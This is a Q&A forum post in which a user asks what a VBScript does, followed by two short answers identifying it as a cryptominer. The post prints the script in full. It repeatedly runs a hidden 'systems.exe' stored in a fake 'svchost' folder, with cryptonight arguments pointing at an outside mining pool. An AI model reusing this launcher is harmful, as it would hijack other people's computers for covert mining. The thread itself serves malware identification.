# What does this vbs file code actually do?

Tags: vbscript

I need to know what this script does:

```
 dim WshShell
    set WshShell = wscript.createObject("WScript.Shell")
    WScript.Sleep(15000)
    Do While 4=4
    On Error Resume Next
    WshShell.Run "C:\ProgramData\svchost\systems.exe -a cryptonight -o soltic.pro:3333",0,true
    If Err.Number <> 0 Then
    WScript.Quit
    End if
    WScript.Sleep(50000)
    Loop
```

and does it run correctly ?

Answer (score 2):

This appears to be malware associated with the CryptoNight mining software.

Answer (score 0):

It starts an external application called `systems.exe`, from the parameters it looks like a cryptominer.